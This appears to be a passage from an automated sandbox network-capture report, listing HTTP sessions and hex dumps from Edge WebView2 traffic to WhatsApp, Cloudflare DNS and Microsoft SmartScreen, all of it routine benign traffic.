                                                                                                                                                                                                                2024-03-10 16:46:09 UTC1500INData Raw: 20 2e 5f 39 74 30 67 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 55 49 49 6e 74 65 72 6e 70 61 67 65 5f 43 6f 6e 74 65 6e 74 20 2e 5f 39 74 30 67 2c 2e 5f 39 74 30 66 7b 72 69 67 68 74 3a 30 7d 2e 5f 39 74 30 67 20 2e 5f 39 74 30 6b 20 2e 5f 39 74 30 68 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 31 32 38 63 37 65 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 36 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 36 70 78 7d 2e 5f 61 66 38 67 20 2e 5f 39 74 30 67 20 2e 5f 39 74 30 68 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 31 37 2c 20 32 37 2c 20 33 33 2c 20 2e 32 29 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 20 30
                                                                                                                                                                                                                Data Ascii: ._9t0g{position:relative}.UIInternpage_Content ._9t0g,._9t0f{right:0}._9t0g ._9t0k ._9t0h{border-bottom:1px solid #128c7e;margin:0;padding-bottom:16px;padding-top:16px}._af8g ._9t0g ._9t0h{border-bottom:1px solid rgba(17, 27, 33, .2);margin:0;padding:0 0
                                                                                                                                                                                                                2024-03-10 16:46:10 UTC1500INData Raw: 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 31 36 70 78 20 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 5f 61 67 31 32 20 2e 5f 61 67 31 6e 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 70 61 64 64 69 6e 67 3a 31 36 70 78 20 32 34 70 78 7d 2e 5f 61 67 31 32 20 2e 5f 61 67 31 6e 20 2e 5f 61 67 31 6f 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 67 61 70 3a 34 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 5f 61 67 31 32 20 2e 5f 61 67 31 6e 20 2e 5f 39 76 63 76 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 7d 2e 5f 61 67 31 32 20 2e 5f 39 74 6a 71 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 37
                                                                                                                                                                                                                Data Ascii: ustify-content:center;padding:16px 0;width:100%}._ag12 ._ag1n{color:#fff;padding:16px 24px}._ag12 ._ag1n ._ag1o{display:flex;flex-direction:column;gap:4px;text-align:left}._ag12 ._ag1n ._9vcv{font-size:12px}._ag12 ._9tjq{padding-top:0}@media (min-width: 7
                                                                                                                                                                                                                2024-03-10 16:46:10 UTC1500INData Raw: 7b 7a 2d 69 6e 64 65 78 3a 31 7d 2e 5f 61 62 6a 2d 20 2e 5f 39 77 6d 37 20 2e 5f 39 77 6d 39 3a 3a 61 66 74 65 72 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 39 30 64 65 67 29 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 74 72 61 6e 73 66 6f 72 6d 20 34 38 30 6d 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 7d 2e 5f 61 62 6a 2d 20 2e 5f 39 77 6d 37 20 2e 5f 39 77 6d 61 2c 2e 5f 39 77 6d 37 20 2e 5f 39 77 6d 61 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 20 23 66 30 66 34 66 39 3b 6d 61 72 67 69 6e 3a 30 7d 2e 5f 39 77 6d 37 20 2e 5f 39 77 6d 62 7b 63 6f 6c 6f 72 3a 23 35 65 35 65 35 65 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 74 72 61 6e 73 66 6f 72 6d 20 34 38 30 6d 73 20 65
                                                                                                                                                                                                                Data Ascii: {z-index:1}._abj- ._9wm7 ._9wm9::after{transform:rotate(-90deg);transition:transform 480ms ease-in-out}._abj- ._9wm7 ._9wma,._9wm7 ._9wma{border-bottom:2px solid #f0f4f9;margin:0}._9wm7 ._9wmb{color:#5e5e5e;pointer-events:none;transition:transform 480ms e
                                                                                                                                                                                                                2024-03-10 16:46:10 UTC767INData Raw: 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 67 61 70 3a 31 36 70 78 7d 2e 5f 39 77 6d 37 2e 5f 61 65 64 66 20 2e 5f 39 77 6e 39 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 36 70 78 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 37 36 38 70 78 29 7b 2e 5f 39 77 6d 37 2e 5f 61 65 64 66 20 2e 5f 39 77 6d 61 20 2e 5f 39 77 6d 39 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65 78 2d 73 74 61 72 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 35 30 70 78 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 5f 39 77 6d 37 2e 5f 61 65 64 66 3a 6e 6f 74 28 2e 5f 61 65 64 67 29 20 2e 5f 39 77 6d 61 3a 6e 6f 74 28 2e 5f 39 77 6d 35 29 20 2e 5f 39 77 6d 36 7b 6d 61 78 2d 68 65 69 67 68 74 3a 30 7d 2e 5f 39 77 6d 37 2e 5f 61 65 64
                                                                                                                                                                                                                Data Ascii: ex;flex-direction:column;gap:16px}._9wm7._aedf ._9wn9{padding-bottom:16px}@media (min-width: 768px){._9wm7._aedf ._9wma ._9wm9{align-self:flex-start;padding-right:150px;width:100%}._9wm7._aedf:not(._aedg) ._9wma:not(._9wm5) ._9wm6{max-height:0}._9wm7._aed


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                8192.168.2.449758172.64.41.34433352C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2024-03-10 16:46:10 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                Content-Length: 128
                                                                                                                                                                                                                Accept: application/dns-message
                                                                                                                                                                                                                Accept-Language: *
                                                                                                                                                                                                                User-Agent: Chrome
                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                2024-03-10 16:46:10 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                2024-03-10 16:46:10 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                Date: Sun, 10 Mar 2024 16:46:10 GMT
                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                Content-Length: 468
                                                                                                                                                                                                                CF-RAY: 8624c782be8f0a03-LAS
                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                2024-03-10 16:46:10 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 86 00 04 8e fb 02 5e 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                Data Ascii: wwwgstaticcom^)


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                9192.168.2.44976231.13.65.494433352C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2024-03-10 16:46:12 UTC846OUTGET /v/t39.8562-34/317094452_674406960787691_2379683082953204863_n.png?ccb=1-7&_nc_sid=73b08c&_nc_ohc=oR3xu8RL-Y8AX-4ifa9&_nc_ht=scontent.whatsapp.net&oh=01_AdT3h8Ax7apLe18qhzUe-P1f9GTqK1ua1QGMyu3-SLk1Zw&oe=65F20528 HTTP/1.1
                                                                                                                                                                                                                Host: scontent.whatsapp.net
                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117", "Microsoft Edge WebView2";v="117"
                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                Referer: https://www.whatsapp.com/
                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                2024-03-10 16:46:13 UTC629INHTTP/1.1 200 OK
                                                                                                                                                                                                                x-storage-error-category: dfs:none;sc_p:200:WSE_NOT_SET
                                                                                                                                                                                                                Last-Modified: Fri, 25 Nov 2022 21:29:47 GMT
                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                X-Needle-Checksum: 1597898430
                                                                                                                                                                                                                thrift_fmhk: GBAveIXttCQG3WJxCf0HU79VFfarm9sDvFUAAAA=
                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                Cache-Control: max-age=1209600, no-transform
                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                Date: Sun, 10 Mar 2024 16:46:13 GMT
                                                                                                                                                                                                                X-FB-Connection-Quality: MODERATE; q=0.3, rtt=198, rtx=0, c=14, mss=1274, tbw=3337, tp=-1, tpl=-1, uplat=1, ullat=-1
                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                Content-Length: 117847
                                                                                                                                                                                                                2024-03-10 16:46:13 UTC1500INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 28 00 00 02 4a 08 03 00 00 00 a8 0d 28 e7 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 03 00 50 4c 54 45 0a 13 19 09 18 22 1c 1c 22 09 18 1f 1a 18 1d 0f 17 1e 19 18 21 1e 1a 20 0a 11 17 15 19 1e 0b 1b 22 0a 15 1d 13 16 1c 1e 1b 25 24 1d 26 26 20 28 0e 14 1a 20 1e 23 0a 1b 26 bc c6 c5 17 1c 21 c0 c8 c5 26 20 22 bf c6 c2 23 1b 21 2c 22 2a 13 17 22 11 1b 21 bc c4 c4 31 26 2b 73 74 6f 95 81 60 b8 c3 c5 2b 1e 23 90 82 61 11 1d 26 bf c6 c6 72 75 73 2b 24 25 bd c3 bf 17 1b 26 b9 c1 c1 95 85 61 89 7c 62 8a 7b 58 b8 c0 be 52 40 30 8d 7f 5c 73 77 76 3c 2d 2f 8b 80 62 88 75 56 1e 20 29 c4 c9 c5 92 7d 5c 88 7d 5d 88 78 5d 3e 3f 53 b9 c4 c2 39 3d 4d 35 2c 2f 8f 7d
                                                                                                                                                                                                                Data Ascii: PNGIHDR(J(gAMAasRGBPLTE""! "%$&& ( #&!& "#!,"*"!1&+sto`+#a&rus+$%&a|b{XR@0\swv<-/buV )}\}]x]>?S9=M5,/}
                                                                                                                                                                                                                2024-03-10 16:46:13 UTC16333INData Raw: 20 c0 96 73 5a 69 69 7c a7 a1 19 a9 82 c0 10 36 a8 82 2c 30 00 38 b6 a1 1e bc 3d a3 3d 1e 06 1f ac 84 c5 1a 60 00 cf 1a 0f f2 81 90 70 6b a0 52 dc d0 1a b7 6a f8 6b 69 1b 50 ef 7e bc 3d 9d 80 d3 dd c1 fe 78 0a f3 ed 8f a3 73 e3 01 13 25 34 86 88 08 29 0a e9 bb 16 4e b5 5a ed f0 ca 95 95 eb 6b 6b 9f 1f 91 53 d2 e9 c4 49 5c 6c ed 14 7b d7 80 27 af 60 be 22 4e e3 14 9c 92 78 1d b0 3a b3 bc 2c 6b 48 ad 9c 41 51 20 35 03 aa e7 27 ef 8c 7f f4 e5 d9 31 96 1d 92 c2 0b f6 32 f4 1e 88 61 92 0e cf 2c 60 20 2e 37 54 b2 1c 40 2d 52 eb 80 76 ea e3 02 c2 c3 3c 0d ac 84 09 05 dc 37 cb f0 a4 00 18 eb 39 d5 05 06 65 7d 4b ce 90 4e 20 29 3e 5f 4a dc 45 c2 cd c6 c7 1d 60 72 48 4d 5b 90 87 51 b5 47 68 b8 0a a3 82 a9 47 44 4a 60 3d f4 c2 b9 f1 a6 d3 69 38 18 dc bd 3a ce 0e 10
                                                                                                                                                                                                                Data Ascii: sZii|6,08==`pkRjkiP~=xs%4)NZkkSI\l{'`"Nx:,kHAQ 5'12a,` .7T@-Rv<79e}KN )>_JE`rHM[QGhGDJ`=i8:
                                                                                                                                                                                                                2024-03-10 16:46:13 UTC16384INData Raw: 17 3c 1e 3f 76 ca f5 cd 83 dd dd fd ed 83 93 42 b3 b0 f9 6a ff fe ee e3 23 06 94 25 a3 cf f5 cb 61 30 bc 9c 4e df 00 1c d1 e7 0d 01 29 2b 83 36 d8 f5 13 b2 52 ed 75 06 d4 23 b0 13 04 d6 e4 f0 90 94 74 85 ff 1f 10 fa c9 e9 3a a3 9f bc a1 33 d4 87 83 27 40 ef ea f8 e9 b1 64 e1 19 d3 90 5b 40 01 d4 2a bb a4 5c 01 49 58 a2 a9 e6 a5 58 05 42 e7 e8 04 00 95 ca a4 97 59 6c 41 96 c5 67 67 65 87 79 32 19 9f 61 c5 2e c9 71 23 89 14 c8 0b 40 fd 7d 1b 1c 65 94 6d 4d 9d 50 f7 ae a1 8a 90 3a 7e 1f 9d 1d 22 52 b5 11 55 3b c3 ce 6f 95 20 d9 ab 5d cd f4 4c ad 67 5b a1 56 e6 9d 3e 5a 2d 8a cd 96 6b d4 37 b7 ef 7c f6 c9 9d fb bb c5 8d a3 8d 93 ff 7e 82 b8 3d a9 04 56 a0 f7 20 d2 2d 4b 46 9a fe 73 fa 34 d2 50 aa 2c 35 69 a8 c6 a7 48 4e 4a a8 c6 52 56 89 aa 25 05 d3 bb 37 ff
                                                                                                                                                                                                                Data Ascii: <?vBj#%a0N)+6Ru#t:3'@d[@*\IXXBYlAggey2a.q#@}emMP:~"RU;o ]Lg[V>Z-k7|~=V -KFs4P,5iHNJRV%7
                                                                                                                                                                                                                2024-03-10 16:46:13 UTC16384INData Raw: ad 12 04 75 3f e3 e2 07 35 8c a5 1a a7 29 2b 27 01 f2 3f 0d 08 34 74 5d fa 21 d7 f1 d2 1e dc b3 0b b1 17 0a 86 f2 83 74 c6 0c 54 20 89 64 8c 3e 32 85 8c 6f 00 60 40 74 4c 05 f8 26 19 9b 1b 15 d6 16 1a 67 67 1c de e6 a6 d8 c1 de fe ee b1 cc 5a bd 07 98 84 71 9d 3f 50 a3 0e db 40 53 47 a4 0b e0 d6 0d e0 3a 20 44 6f c8 39 b3 75 a0 5b 40 48 d4 28 c8 a9 ff b0 88 29 5e 01 36 11 fd 4e fa e4 44 6a 75 26 9d f1 63 e7 fa e2 e6 f5 cd 8f 1f a7 b7 67 f7 8d aa 95 ef 6e e5 8a 90 d4 47 2e 76 97 e7 bc b9 90 4c ae e1 00 5c 54 62 5d e3 d4 e3 f2 01 6b bf 04 55 7e 7c c8 31 4d 10 95 90 ba 27 5e 13 db 0e ba ee 01 5a b2 ca 8e 87 f8 f2 b4 00 62 8a a0 ab 91 52 b0 43 28 18 fe ab e7 c5 57 d9 33 89 42 da 40 e4 35 10 1f 03 56 6d 0a f1 42 25 4c d2 4b b1 c9 e3 09 9f ba 2e f8 80 e9 ce d9
                                                                                                                                                                                                                Data Ascii: u?5)+'?4t]!tT d>2o`@tL&ggZq?P@SG: Do9u[@H()^6NDju&cgnG.vL\Tb]kU~|1M'^ZbRC(W3B@5VmB%LK.
                                                                                                                                                                                                                2024-03-10 16:46:13 UTC14935INData Raw: f7 c2 01 12 54 55 f5 58 54 8f a8 99 63 d1 d1 51 2b 91 40 e5 a6 17 30 10 aa 20 15 8c 5e c1 83 c8 01 1b 13 93 85 a8 98 47 74 62 49 11 ea 10 14 85 27 f3 1c e9 ca 00 c3 5a 0e 1c 1b 2e 5e 71 53 92 5b 97 70 02 fd b9 12 68 a6 6b 6a 42 4d 24 cc b4 b9 fa e3 cf 26 4d 73 6e 2e fd d5 dc f2 dc e4 f2 a4 39 67 6a 8d a4 54 ae b9 cf 1c c3 68 23 78 02 ab 74 3b 83 24 da 12 54 c3 38 77 87 48 95 5b 81 97 fb d2 a3 8b a7 68 e1 ed f8 bd be 60 7c ff e1 9e e0 50 a8 67 7c a0 a7 27 be be 7e f3 4f ad 07 bb 1e f5 06 40 bd 6e 22 3f 41 73 9d 7b f3 6d 17 6d 5d 77 60 4f a0 8b b6 86 3a 00 a8 42 47 ce 7c 7e 31 42 08 81 56 b8 79 17 4b 9d 78 ee 5d bc b0 4a 43 bc 8c f1 5f 84 3f c1 c4 75 3d 9b e7 b0 2b 7d 54 44 95 2c 8b b2 26 9f d5 12 d0 9f a2 20 50 29 5c 15 45 49 ca 2b d2 58 54 19 1b 93 54 50
                                                                                                                                                                                                                Data Ascii: TUXTcQ+@0 ^GtbI'Z.^qS[phkjBM$&Msn.9gjTh#xt;$T8wH[h`|Pg|'~O@n"?As{mm]w`O:BG|~1BVyKx]JC_?u=+}TD,& P)\EI+XTTP
                                                                                                                                                                                                                2024-03-10 16:46:13 UTC1500INData Raw: b2 83 57 b1 ea 09 87 03 4c 70 3c dd 94 ba ea c3 f9 83 22 76 bd 42 97 f2 bf 2c 5d 4f 68 1b f9 19 f5 2e 4d 0f 0b a5 a4 84 85 6d 58 86 9d 5c c2 cc 90 81 99 30 1a 68 e6 8f 76 a7 46 c8 1e 53 67 a4 8c 32 4a 98 e9 2c 7b 10 46 ac 84 34 12 f8 32 87 21 37 d3 8b f1 d1 a1 a4 a6 68 45 70 0c 3e e4 a2 74 c1 6e 0d b9 24 87 ae 89 4e 2d 14 c3 82 49 f1 16 8c 2f 7b e9 7b a3 08 cb 28 c2 97 3c be ef 7d ef 7d df f7 fb 4d af c8 41 e0 dc 8b 15 d4 51 61 84 6e 70 61 58 4e 28 34 1c 09 3e 19 8a 53 a2 7f 16 e7 45 0e 4f 37 f0 38 f6 ab 79 03 88 84 49 30 2a 0e 0f 6b 64 33 6f 94 70 9c e3 14 7c 34 2d 71 22 52 d3 f0 2f fd 89 28 54 10 ac 86 1b a4 e9 c1 41 8a df f3 60 64 a4 6e a2 5a 60 ac b3 33 2d 9d db 63 b8 76 23 4d c7 96 be 74 eb e6 f5 cd 7f 9c be 3c da 7c c5 d9 fa 27 9f fd 7d 97 21 55 ee
                                                                                                                                                                                                                Data Ascii: WLp<"vB,]Oh.MmX\0hvFSg2J,{F42!7hEp>tn$N-I/{{(<}}MAQanpaXN(4>SEO78yI0*kd3op|4-q"R/(TA`dnZ`3-cv#Mt<|'}!U
                                                                                                                                                                                                                2024-03-10 16:46:13 UTC16333INData Raw: 7d 73 ff fe d3 df 7c 74 ed cf e7 9d 45 c6 81 9b a0 a2 c0 e3 1c 5c c1 ef 45 bb ad 17 ad 56 87 8c f5 af c7 8f 5b 44 6a 46 9d 80 00 32 75 40 56 7e e4 0c 0b 15 0f a5 ae 2b 43 43 81 ad 4c ad 4c 40 80 04 57 43 b9 a9 f0 c4 1f 08 09 86 46 cd a8 12 4c f1 c2 55 78 9b 8b 0a f5 ed ca 46 66 d9 70 81 36 52 0f 3e d1 86 7e 12 04 48 ac 70 90 3b 7a a0 f1 af f2 06 6d ac 50 2d 58 f5 73 29 84 20 2f 6a 10 4b 79 10 a2 c8 25 5e 43 82 7d 09 85 62 14 9c 39 52 21 4a 83 01 03 89 cc 54 22 f5 a1 3b fe 7a df 1b 88 5e 4f a8 55 8d b0 62 05 6e 00 9c dc 76 1a 5b e9 d8 80 5d 60 34 d5 77 fc 95 1d c0 55 6f d5 97 8e 2f df 7c bd 79 74 fa f5 db cf fe f4 cd f1 cb 87 37 7f f1 fd f9 76 a7 e4 71 1f 20 11 ad 45 12 46 63 7c e3 13 27 ae 24 6c 3c 6e f9 fc 48 93 43 46 e7 d8 1d 6c 05 d9 89 e2 27 f3 a8 1a
                                                                                                                                                                                                                Data Ascii: }s|tE\EV[DjF2u@V~+CCLL@WCFLUxFfp6R>~Hp;zmP-Xs) /jKy%^C}b9R!JT";z^OUbnv[]`4wUo/|yt7vq EFc|'$l<nHCFl'
                                                                                                                                                                                                                2024-03-10 16:46:13 UTC16384INData Raw: 61 23 1f c5 e9 e8 17 33 e1 ac 0b 85 da 07 46 65 aa 6d 94 2f 38 00 09 e5 36 bd 09 47 bb ca 7f 3b 69 a2 a2 e9 79 7a fd 7e d8 73 f6 e6 4d e7 4d 78 fb da 6f 26 7e 0f 5b 81 27 39 51 cf b3 50 e3 76 c7 06 dc e8 3d 60 94 03 08 30 d1 a7 41 0c 2f 9f 6b 2f 66 7e 07 86 11 05 f3 02 b3 81 10 78 4e ce 00 eb 64 33 a8 15 5c d3 e4 bd df 06 24 dc d0 4c 57 2e d0 7c c0 32 03 41 57 51 49 eb 43 dd 55 ed 8a 7d ea 2c 87 40 50 a1 65 95 ad 72 45 6c e9 73 04 e3 84 b8 f7 c3 59 bc 53 47 52 14 f7 18 c7 53 d6 6c 0e 09 d0 7b 60 c5 61 97 78 d4 9b 3e 88 67 8b d6 1c 82 b1 c8 3b b4 ff 3b 85 b9 f3 e7 a7 1f 2e bb 55 89 51 b6 bf cf 2c 27 6c 55 e3 c9 11 4f 6a be dd ea 6a 79 55 ca ec ae 1e 4a d5 c3 dd ea fa 21 d2 20 eb bf f6 2a a4 bd d1 7b 45 a6 9a 9c 0e 87 7b 70 ae 5e c7 e3 f9 ed ef 26 a6 a6 10
                                                                                                                                                                                                                Data Ascii: a#3Fem/86G;iyz~sMMxo&~['9QPv=`0A/k/f~xNd3\$LW.|2AWQICU},@PerElsYSGRSl{`ax>g;;.UQ,'lUOjjyUJ! *{E{p^&
                                                                                                                                                                                                                2024-03-10 16:46:13 UTC16384INData Raw: eb b9 a8 d1 ca 0b 3a d9 6e e9 e8 6e d5 88 03 10 e7 3c 50 2a bc 9b b1 f4 4b e5 7d 8b 30 b0 31 cb 6d 36 7c b8 9b 0e 61 3f 54 7b 47 e1 09 49 8a 56 be a0 25 9e 31 fb b2 a1 82 b7 35 9d 83 17 c8 ec 77 5a 19 a3 d8 b6 d3 a8 61 dc 69 13 5c dd df 5f 01 ae 33 44 4b fa 07 de aa 6f a6 ba a6 2c a0 bc e0 b5 de a2 7e 4b 52 67 a5 a8 ed d6 19 8f 0a c0 75 b4 b3 cd b9 e4 4c 75 a8 64 94 44 12 39 d8 4b 7b 83 eb 2b 9e 8b d2 fb 1d 67 a7 1f 0e b6 a9 ce 85 ae 32 94 50 a2 5a b5 c2 a7 49 8d 86 a0 b6 08 b5 5e 21 08 65 e2 f1 1f 3c a6 b5 51 48 1c 7b 87 fe e7 5d 50 2c b9 05 dd 92 93 d2 d4 0e ae ae b6 28 4c d4 31 04 9f a1 bf b6 b1 e8 18 34 d9 42 c6 5d bb df 57 43 85 11 57 3e 01 6f e3 86 82 42 69 17 f3 ae d8 7e 30 ce 05 bc 87 f3 ed ee 3f 0f d7 07 bb 9f 4a 03 e3 a3 1a 53 a7 3f 1e 6e 43 f5
                                                                                                                                                                                                                Data Ascii: :nn<P*K}01m6|a?T{GIV%15wZai\_3DKo,~KRguLudD9K{+g2PZI^!e<QH{]P,(L14B]WCW>oBi~0?JS?nC
                                                                                                                                                                                                                2024-03-10 16:46:13 UTC1710INData Raw: 59 15 96 14 74 44 90 a6 09 a4 d0 0a c8 fc 39 4e 76 d3 34 df 7f de 0a 06 61 73 27 80 ee 84 d3 fd fd ff ab b4 56 24 c7 91 28 e8 93 98 79 a1 62 e6 0a ea 10 10 5a a3 65 c5 54 11 8a 58 a0 0b a8 48 1d c0 07 10 9a 43 2c 1f 34 50 c8 74 6c 20 d2 17 68 66 b2 f9 79 b2 3d 6e b7 64 bb a5 8e ae ec cc 7c f9 9e 54 27 6c da 22 5a e1 07 33 a0 c0 4e eb 16 58 99 c4 68 43 3c 0b 41 05 b8 59 6a 15 b5 b2 f0 ca 89 9f e4 46 32 c6 27 75 59 16 c1 41 94 48 50 31 28 07 52 3c 10 87 c2 c5 9a 17 58 46 cc 8c 7a 55 49 97 c4 d8 86 0a ff 76 c2 fa eb e3 a0 06 65 88 6c b0 6a 18 a5 cb 0a b4 22 5e f0 d4 1c 1d e9 8a f7 b9 f4 0a a3 a7 c1 6a 74 34 c7 87 b7 de fa a3 f3 33 8e 01 c8 f5 fe ef 5c bc c0 99 eb 4d 65 4e 34 2b be e0 6e 4a da 15 ba 16 25 d8 1a 2a b9 4d b3 a0 de 35 20 93 b8 48 0a 52 ad a5 80
                                                                                                                                                                                                                Data Ascii: YtD9Nv4as'V$(ybZeTXHC,4Ptl hfy=nd|T'l"Z3NXhC<AYjF2'uYAHP1(R<XFzUIvelj"^jt43\MeN4+nJ%*M5 HR


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                10192.168.2.44976320.25.227.1744433352C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2024-03-10 16:46:12 UTC734OUTPOST /api/browser/edge/data/toptraffic/3 HTTP/1.1
                                                                                                                                                                                                                Host: data-edge.smartscreen.microsoft.com
                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                Content-Length: 754
                                                                                                                                                                                                                Accept: application/octet-stream;application/x-patch-bsdiff;
                                                                                                                                                                                                                Authorization: SmartScreenHash eyJhdXRoSWQiOiJjMmU0ZjljYS1lZjYwLTQyY2EtOTAyZi1mNzgwZTFmMTk2YTciLCAia2V5IjoickpZVUI4c044UXlRVXRxMHIwTEhodz09IiwgImhhc2giOiJldU5uM2lBWkJtaz0ifQ==
                                                                                                                                                                                                                Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                If-None-Match: "170540185939602997400506234197983529371"
                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
